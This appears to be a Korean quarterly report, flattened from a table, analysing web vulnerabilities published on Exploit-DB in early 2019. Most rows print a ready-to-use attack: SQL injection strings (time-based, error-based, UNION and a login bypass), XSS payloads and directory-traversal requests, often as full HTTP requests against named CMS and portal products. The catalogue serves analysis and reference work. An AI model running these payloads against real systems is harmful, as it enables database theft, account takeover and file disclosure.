CT%201%20FROM%20(SELECT%20SLEEP(25))A)))OR%27%7c%22XOR(((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)))OR%22*%2f
ICE HRM ICE HRM 23.0
2019-03-15 46545 SQL Injection 중 상 NetData 1.13.0 - HTML Injection
GET /124.53.7.10/?username=test&password=passwordexampleHTTP/1.1Host: 124.53.7.10:5000Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8Referer: http://localhost:19999/Accept-Encoding: gzip, deflateAccept-Language: es-ES,es;q=0.9,en;q=0.8
NetDataNetData1.13.0
2019-03-18 46555 SQL Injection 하 상TheCarProject 2 - Multiple SQL
Injection
GET /124.53.7.10/TheCarProject/cp/includes/loaditem.php?man_id=-1
or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT
COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))xFROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a) HTTP/1.1Content-Length: 364
TheCarProjectTheCarProject
2
날짜 EDB번호 취약점 분류 공격 난이도 공격 위험도 취약점 이름 핵심 공격 코드 대상프로그램 대상환경
EDB 분석 보고서 (2019.1Q)
2019.01.01~2019.03.31 Exploit-DB(http://exploit-db.com)에 공개된 취약점별로 분류한 정보입니다.
2019-03-19 46563 SQL Injection 중 하Netartmedia Real Estate Portal
5.0 - SQL Injection
POST /124.53.7.10/index.php HTTP/1.1Host:124.53.7.10:5000Connection: CloseAccept: text/html, application/xhtml+xml, */*Accept-Language: ko-KRUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2;WOW64; Trident/6.0)Content-Type: multipart/form-data;Content-Length: 873
ProceedSend=1&mod=forgotten_password&user_email=0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z' OR SLEEP(5)#
Netartmedia RealEstate
NetartmediaReal EstatePortal 5.0
2019-03-19 46562 SQL Injection 중 하Netartmedia PHP Mall 4.1 - SQL
Injection
(GET)id=1 AND SLEEP(5)&item=&lang=en&mod=details
(POST)
Email=0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z' OR SLEEP(5)AND 'tOoX'='tOoX&Password=g00dPa$$w0rD&lang=en
NetartmediaNetartmediaPHP Mall 4.1
2019-03-19 46560 SQL Injection 중 하Netartmedia Event Portal 2.0 -
'Email' SQL Injection
Email='||(SELECT 0x59685353 FROM DUAL WHERE 7114=7114 ANDSLEEP(5))||'
NetartmediaNetartmediaEvent Portal
2.0
2019-03-19 46559 SQL Injection 하 상eNdonesia Portal 8.7 - Multiple
Vulnerabilities
/endonesia87/banners.php?op=click&bid=-1 or1=1 and (SELECT 1 and ROW(1,1)>(SELECTCOUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))xFROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
eNdonesiaeNdonesiaPortal 8.7
2019-03-19 46558 XSS 하 하MyBB Upcoming Events Plugin
1.32 - Cross-Site Scriptingname = <script>alert('XSS')</script> MyBB
MyBB UpcomingEvents Plugin
1.32
2019-03-19 46557 XSS 하 중Gila CMS 1.9.1 - Cross-Site
Scripting
GET /10.0.100.24/?search=<--`<img/src=` onerror=confirm``> --!>HTTP/1.1Host: 10.0.100.24:1004
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: PHPSESSID=a5i6r78j7v22ql1qrvtsampff6DNT: 1
Connection: keep-aliveUpgrade-Insecure-Requests: 1
GilaGila CMS1.9.1
2019-03-20 46582 SQL Injection 하 중Netartmedia Deals Portal -
'Email' SQL Injection
POST /10.0.100.24/loginaction.php HTTP/1.1Host: 10.0.100.24User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0)Gecko/20100101 Firefox/45.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-aliveContent-Type: application/x-www-form-urlencoded
Content-Length: 59
Email=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&Password=g00dPa%24%24w0rD&lang=en&mod=login
NetartmediaNetartmediaDeals Portal
2019-03-20 46579 SQL Injection 하 중202CMS v10beta - Multiple SQL
Injection
POST /10.0.100.24/202cms10beta/index.php HTTP/1.1Host: 10.0.100.24User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0)Gecko/20100101 Firefox/45.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 59
log_user=1+%2b+((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2f*%27XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%27%7c%22XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%22*%2f
202CMS v10beta202CMSv10beta
2019-03-20 46577 SQL Injection 하 하Netartmedia PHP Business
Directory 4.2 - SQL Injection
POST /10.0.100.24/USERS/loginaction.php HTTP/1.1Host: 10.0.100.24User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0)Gecko/20100101 Firefox/45.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 59
Email=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&Password=g00dPa%24%24w0rD&lang=en&mod=login
Netartmedia
Netartmedia
PHP BusinessDirectory 4.2
2019-03-20 46576 SQL Injection 하 중Netartmedia PHP Dating Site -
SQL Injection
POST /10.0.100.24/loginaction.php HTTP/1.1Host: 10.0.100.24User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0)Gecko/20100101 Firefox/45.0Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 59
Email=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&Password=g00dPa%24%24w0rD&lang=en&mod=login
NetartmediaNetartmediaPHP Dating
Site
2019-03-20 46575 SQL Injection 하 중Netartmedia Jobs Portal 6.1 -
SQL Injection
POST /10.0.100.24/loginaction.php HTTP/1.1Host: 10.0.100.24User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0)Gecko/20100101 Firefox/45.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-aliveContent-Type: application/x-www-form-urlencoded
Content-Length: 59
Email=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&Password=g00dPa%24%24w0rD&lang=en&mod=login
NetartmediaNetartmediaJobs Portal
6.1
날짜 EDB번호 취약점 분류 공격 난이도 공격 위험도 취약점 이름 핵심 공격 코드 대상프로그램 대상환경
EDB 분석 보고서 (2019.1Q)
2019.01.01~2019.03.31 Exploit-DB(http://exploit-db.com)에 공개된 취약점별로 분류한 정보입니다.
2019-03-20 46574 SQL Injection 중 중Netartmedia PHP Real Estate
Agency 4.0 - SQL Injection
POST /10.0.100.24/index.php HTTP/1.1Host: 10.0.100.24User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0)
Gecko/20100101 Firefox/45.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflateConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 59
ad_type=&bathrooms=&bedrooms=&features[]=(select(0)from(select(sleep(0)))v)/*'%2B(select(0)from(select(sleep(0)))v)%2B'"%2B(sele
ct(0)from(select(sleep(0)))v)%2B"*/&field_location=1&listing_type=&location=&mod=search&only_pictures=1&order_by=date&pfield51_0
=1&pfield51_1=1&pfield51_2=1&price_from=1&price_to=1&search_keyword=&search_type=search_form&size_from=1&size_to=1&type=1&zip=94102&zip_distance=94102&zip_radius=1&zip_type=1
Netartmedia
NetartmediaPHP Real
Estate Agency4.0
2019-03-20 46573 SQL Injection 중 중Netartmedia PHP Car Dealer -
SQL Injection
POST /10.0.100.24/index.php HTTP/1.1Host: 10.0.100.24User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0)Gecko/20100101 Firefox/45.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 59
body_style=&car_make=&car_model=1&condition=&exterior_color=&features[]=(select(0)from(select(sleep(0)))v)/*'%2B(select(0)from(select(sleep(0)))v)%2B'"%2B(select(0)from(select(sleep(0)))v)%2B"*/&fuel_type=&max_mileage=&mod=search&only_pictures=1&order_by=d
ate&price_from=1&price_to=1&search_keyword=&search_type=search_form&transmission=&type=1&year=
NetartmediaNetartmedia
PHP CarDealer
2019-03-21 46590 SQL Injection 상 중Bootstrapy CMS - Multiple SQL
Injection
POST /10.0.100.24/modules/forums/forum-thread.php HTTP/1.1Host: 10.0.100.24User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0)Gecko/20100101 Firefox/45.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate
Connection: keep-aliveContent-Type: application/x-www-form-urlencoded
Content-Length: 59
search=&thread_id=0'XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z
email=sample%40email.tst&message=20&name=wUmrLVWz&subject=0'XOR(
if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z&submit=
body=1&post-id=0'XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z"e=1&submit=&thread-id=1
quote=0&reply=1&submit=&thread-id=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z
BootstrapyBootstrapy
CMS
2019-03-21 46588 SQL Injection 하 하Placeto CMS Alpha v4 - 'page'
SQL Injection
GET /10.0.100.24/placeto/admin/edit.php?page=key HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: PHPSESSID=a5i6r78j7v22ql1qrvtsampff6DNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1
page=JyI" AND 1647=1647 AND "svwN"="svwN
page=JyI" AND SLEEP(5) AND "uIvY"="uIvY
NULL,CONCAT(0x716b627671,0x6a636f485445445466517a4a6f6972635551635179725550617072647371784f6445576b74736849,0x716b6b6b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
PlacetoPlaceto CMSAlpha v4
2019-03-21 46587 SQL Injection 하 중uHotelBooking System -
'system_page' SQL Injection
GET/10.0.100.24/index.php?page=3&system_page=0'XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: PHPSESSID=a5i6r78j7v22ql1qrvtsampff6
DNT: 1
Connection: keep-aliveUpgrade-Insecure-Requests: 1
uHotelBookinguHotelBooking
System
2019-03-21 46586 SQL Injection 하 하
The Company Business
Website CMS - Multiple
Vulnerabilities
user_name=VNfn' UNION ALL SELECTNULL,NULL,NULL,CONCAT(CONCAT('qqkxq','mOiFXJaJzzATyiPlJyQgwuuTiDddtckLMPRRRdEH'),'qjbbq'),NULL,NULL,NULL,NULL--WMfV&user_password=&loggin=Psop
The CompanyBusiness Website
CMS
The CompanyBusiness
Website CMS
2019-03-21 46583 SQL Injection 하 중Netartmedia Vlog System -
'email' SQL Injection
POST /10.0.100.24/index.php HTTP/1.1Host: 10.0.100.24User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0)Gecko/20100101 Firefox/45.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 59
ProceedSend=1&email=-1'%20OR%203*2*1=6%20AND%20000371=000371%20--%20&mod=forgotten_password
NetartmediaNetartmediaVlog System
2019-03-22 46593 SQL Injection 하 중Inout Article Base CMS - SQL
Injection
GET
/10.0.100.24/articles/portalLogin.php?d=65ded5353c5ee48d0b7d48c591b8f430&p=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&u=testHTTP/1.1
InoutInout Article
Base CMS
날짜 EDB번호 취약점 분류 공격 난이도 공격 위험도 취약점 이름 핵심 공격 코드 대상프로그램 대상환경
EDB 분석 보고서 (2019.1Q)
2019.01.01~2019.03.31 Exploit-DB(http://exploit-db.com)에 공개된 취약점별로 분류한 정보입니다.
2019-03-22 46592 SQL Injection 하 하Meeplace Business Review
Script - 'id' SQL Injection
GET /10.0.100.24/ad/addclick.php?&id=1 RLIKE (SELECT * FROM(SELECT(SLEEP(5)))qcFZ) HTTP/1.1 Meeplace
MeeplaceBusiness
Review Script
2019-03-22 46591 SQL Injection 하 중Matri4Web Matrimony Website
Script - Multiple SQL Injection
POST /10.0.100.24/simplesearch_results.php HTTP/1.1Host: 10.0.100.24User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0)Gecko/20100101 Firefox/45.0Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 59
Fage=18&Tage=18&caste=Any&religion=Any&submit=Submit&txtGender=-
1'%20OR%203*2*1=6%20AND%20000715=000715%20--%20&txtphoto=1&txtprofile=0
age1=18&age2=18&caste[]=Any&cboCountry[]=&city[]=Any&edu[]=Any&ms=Unmarried&occu[]=Any&religion=-1'%20OR%203*2*1=6%20AND%20000723=000723%20--%20&state[]=Any&submit=Submit&txtGender=Male&txtphoto=Show%20profiles%20with%20Photo
Matri4Web
Matri4WebMatrimonyWebsiteScript
2019-03-25 46603 SQL Injection 중 중Zeeways Matrimony CMS - SQL
Injection
POST /10.0.100.24/profile_list HTTP/1.1Host: 10.0.100.24User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0)Gecko/20100101 Firefox/45.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 59
up_cast=(select 1 and row(1,1)>(selectcount(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(117),CHAR(82),CHAR(120),CHAR(106),CHAR(69),CHAR(48),CHAR(117),CHAR(107)),floor(rand()*2))xfrom (select 1 union select 2)a group by x limit 1))
ZeewaysZeeways
Matrimony CMS
2019-03-25 46602 SQL Injection 하 하Zeeways Jobsite CMS - 'id' SQL
Injection
GET /10.0.100.24/news_details.php?id=-5236" OR 1 GROUP BYCONCAT(0x716a627871,(SELECT (CASE WHEN(5640=5640) THEN 1 ELSE 0 END)),0x71626b6271,FLOOR(RAND(0)*2))HAVINGMIN(0)# HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: PHPSESSID=a5i6r78j7v22ql1qrvtsampff6DNT: 1
Connection: keep-aliveUpgrade-Insecure-Requests: 1
ZeewaysZeeways
Jobsite CMS
2019-03-25 46599 SQL Injection 하 하Jettweb PHP Hazır Haber Sitesi
Scripti V3 - SQL Injection
GET /10.0.100.24/fonksiyonlar.php?fgit=videoyorumlar&videoid=1'UNION ALL SELECTNULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT('qvzqq','LtSqAGUtJGxRGVrFfaFBRmvYYHCMdjkRYqQBbQfc'),'qqkjq'),NULL,NULL-- HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: PHPSESSID=a5i6r78j7v22ql1qrvtsampff6DNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1
Jettweb
Jettweb PHP
Hazır Haber
Sitesi Scripti V3
2019-03-25 46598 SQL Injection 하 하
Jettweb PHP Hazır Haber Sitesi
Scripti V2 - SQL Injection
(Authentication Bypass)
POST /10.0.100.24/yonetim/admingiris.php HTTP/1.1
Host: 10.0.100.24User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0)Gecko/20100101 Firefox/45.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 59
Username='=' 'or'Password='=' 'or'
Jettweb
Jettweb PHP
Hazır Haber
Sitesi Scripti V2
2019-03-25 46597 SQL Injection 하 중Jettweb PHP Hazır Haber Sitesi
Scripti V1 - SQL Injection
GET /10.0.100.24/gallery.php?gallery_id=1' UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a786b71,0x63565549564d5a424e57746d6d62614e4f6e4a7559666a744d50557776636e4e6a6952504d494444,0x71626a7a71)-- HTTP/1.1
Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: PHPSESSID=a5i6r78j7v22ql1qrvtsampff6DNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1
Jettweb
Jettweb PHP
Hazır Haber
Sitesi Scripti V1
2019-03-25 46595 XSS 하 하Apache CouchDB 2.3.1 - Cross-
Site Scripting
GET/_node/couchdb@localhost/_config/test/%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3EHTTP/1.1Host: 127.0.0.1:5984User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)Gecko/20100101 Firefox/65.0Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflateReferer: http://127.0.0.1:5984/_utils/content-type: application/jsonpragma: no-cacheOrigin: http://127.0.0.1:5984
Content-Length: 6DNT: 1Connection: closeCookie: _ga=GA1.1.781615969.1550605249Cache-Control: max-age=0
Apache CouchDBApache
CouchDB 2.3.1
날짜 EDB번호 취약점 분류 공격 난이도 공격 위험도 취약점 이름 핵심 공격 코드 대상프로그램 대상환경
EDB 분석 보고서 (2019.1Q)
2019.01.01~2019.03.31 Exploit-DB(http://exploit-db.com)에 공개된 취약점별로 분류한 정보입니다.
2019-03-26 46612 SQL Injection 하 하SJS Simple Job Script - SQL
Injection
POST /10.0.100.24/searched HTTP/1.1Host: 10.0.100.24User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0)Gecko/20100101 Firefox/45.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 59
landing_location=-1%20OR%203*2*1=6%20AND%20000405=000405%20--%20&landing_title=test
SJSSJS SimpleJob Script
2019-03-26 46612 XSS 하 하SJS Simple Job Script - Cross-
Site Scripting
GET
/10.0.100.24//jobs?_=1&job_type_value[]=Full%20time&srch_location_val[]=fulltime_ctype HTTP/1.1
SJSSJS SimpleJob Script
2019-03-26 46611 Directory Traversal 하 하
Titan FTP Server Version 2019
Build 3505 - Directory Traversal
/ Local File Inclusion
GET/PreviewHandler.ashx?path=\..\..\..\..\Python27\README.txt&filename=README.txt
Titan FTP Server
Titan FTPServer
Version 2019Build 3505
2019-03-26 46612 SQL Injection 하 중 XooDigital - 'p' SQL Injection
POST /10.0.100.24/get_job_applications_ajax.php HTTP/1.1Host: 10.0.100.24User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0)Gecko/20100101 Firefox/45.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 59
job_id=-1%20OR%203*2*1=6%20AND%20000615=000615%20--%20
landing_location=-1%20OR%203*2*1=6%20AND%20000405=000405%20--%20&landing_title=test
employerid=if(now()=sysdate(),sleep(0),0)
app_id=(select(0)from(select(sleep(0)))v)/*'%2B(select(0)from(select(sleep(0)))v)%2B'"%2B(select(0)from(select(sleep(0)))v)%2B"*
/
XooDigital XooDigital
2019-03-26 46609 SQL Injection 하 하XooGallery - Multiple SQL
Injection
GET /10.0.100.24/gal.php?gal_id=29' AND 2692=2692 AND'WCFf'='WCFf HTTP/1.1Host: 10.0.100.24:1004
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: PHPSESSID=a5i6r78j7v22ql1qrvtsampff6
DNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1
photo_id=1' AND 5479=5479#
cat_id=1' AND 9338=9338 AND 'SZIH'='SZIH
p=-8412' OR 2597=2597#
XooGallery XooGallery
2019-03-26 46608 XSS 하 하Rukovoditel ERP & CRM 2.4.1 -
'path' Cross-Site Scripting
POST /10.0.100.24/index.php? HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0)Gecko/20100101 Firefox/65.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: https://localhost/XXX/s/admin/entries/news/258-craft-cms-3-1-12-pro-xss-test
Content-Type: application/x-www-form-urlencoded
module=items/items&path=%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22VULNERABLE%22)%3E
RukovoditelRukovoditelERP & CRM2.4.1
2019-03-26 46606 SQL Injection 하 하Jettweb Php Hazır İlan Sitesi
Scripti V2 - SQL Injection
GET /10.0.100.24/m/katgetir.php?kat=1' OR NOT 1300=1300-- rwTfHTTP/1.1 Jettweb
Jettweb Php
Hazır İlan Sitesi
Scripti V2
2019-03-27 46614 SQL Injection 중 중Jettweb Hazır Rent A Car Scripti
V4 - SQL Injection
GET /10.0.100.24/admin/index.php?admin=vitestipi&tur=VitesTipi'AND 2211=2211 AND 'fVeE'='fVeE HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=a5i6r78j7v22ql1qrvtsampff6
DNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1
admin=rez-gor&id=2 AND SLEEP(5)
admin=ozellikekle&itemid=1&ozellikdil=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&syf=ceviriguncelle&tur=VitesTipi
Jettweb
Jettweb Hazır
Rent A Car
Scripti V4
2019-03-28 46624 SQL Injection 하 중
Jettweb PHP Hazır Rent A Car
Sitesi Scripti V2 -
'arac_kategori_id' SQL Injection
POST /10.0.100.24/fiyat-goster.html HTTP/1.1Host: 10.0.100.24User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0)Gecko/20100101 Firefox/45.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 59
arac_kategori_id=-1' OR 3*2*1=6 AND 000224=000224 --
Jettweb
Jettweb PHP
Hazır Rent A
Car Sitesi
Scripti V2
2019-03-28 46623 SQL Injection 하 중BigTree 4.3.4 CMS - Multiple
SQL Injection
GET /10.0.100.24/BigTree-CMS/site/index.php/admin/ajax/tags/get-page/?page='or 1=1--&sort= HTTP/1.1 BigTree
BigTree 4.3.4CMS
날짜 EDB번호 취약점 분류 공격 난이도 공격 위험도 취약점 이름 핵심 공격 코드 대상프로그램 대상환경
EDB 분석 보고서 (2019.1Q)
2019.01.01~2019.03.31 Exploit-DB(http://exploit-db.com)에 공개된 취약점별로 분류한 정보입니다.
2019-03-28 46622 SQL Injection 하 하Job Portal 3.1 - 'job_submit'
SQL Injection
POST /10.0.100.24/newjobportal/job_search/search HTTP/1.1
Host: 10.0.100.24User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0)Gecko/20100101 Firefox/45.0Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 59
job_submit=convert(int%2c+cast(0x454d49524f474c55+as+varchar(8000)))
Job PortalJob Portal
3.1
2019-03-28 46620 SQL Injection 중 상i-doit 1.12 - 'qr.php' Cross-Site
Scripting
/IP_ADDRESS/src/tools/php/qr/qr.php?url=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
i-doit i-doit 1.12
2019-03-28 46617 SQL Injection 중 중Fat Free CRM 0.19.0 - HTML
Injection
POST /comments HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0)Gecko/20100101 Firefox/65.0Accept: */*;q=0.5, text/javascript, application/javascript,application/ecmascript, application/x-ecmascriptAccept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateX-CSRF-Token:xikVMkG4Le6llfW44C7CQZsD3Qz7bDgbMCbPFCtMjbzJFTfTF5SOx6xPhFDB6EL8MFNSNspHI51gZqz4V7QNMQ==Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 162DNT: 1Connection: close
utf8=%E2%9C%93&comment%5Bcommentable_id%5D=143&comment%5Bcommentable_type%5D=Contact&comment%5Bcomment%5D=%22%3E%3Ch1%3EIsmail+Tasdelen%3C%2Fh1%3E&commit=Add+Note
Fat FreeFat Free CRM
0.19.0
2019-03-28 46616 SQL Injection 중 중Airbnb Clone Script - Multiple
SQL Injection
GET/10.0.100.24/admin/edit.php?id=if(now()=sysdate()%2Csleep(0)%2C0) HTTP/1.1Host: 10.0.100.24:1004
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: PHPSESSID=a5i6r78j7v22ql1qrvtsampff6DNT: 1Connection: keep-alive
Upgrade-Insecure-Requests: 1
checkin=mm/dd/yy&checkout=mm/dd/yy&hosting_id=1' AND SLEEP(5)--DXVl&number_of_guests=1
catid=-1'%20OR%203*2*1=6%20AND%20000640=000640%20--%20
pt=-1'%20OR%203*2*1=6%20AND%20000929=000929%20--%20
val=-1'%20OR%203*2*1=6%20AND%20000886=000886%20--%20
AirbnbAirbnb Clone
Script
2019-03-28 46615 Directory Traversal 하 하
Thomson Reuters Concourse &
Firm Central < 2.13.0097 -
Directory Traversal / Local File
Inclusion
GET\..\..\..\..\..\..\..\..\..\..\Windows\System32\drivers\etc\hosts HTTP/1.1
Thomson
ThomsonReuters
Concourse &Firm Central< 2.13.0097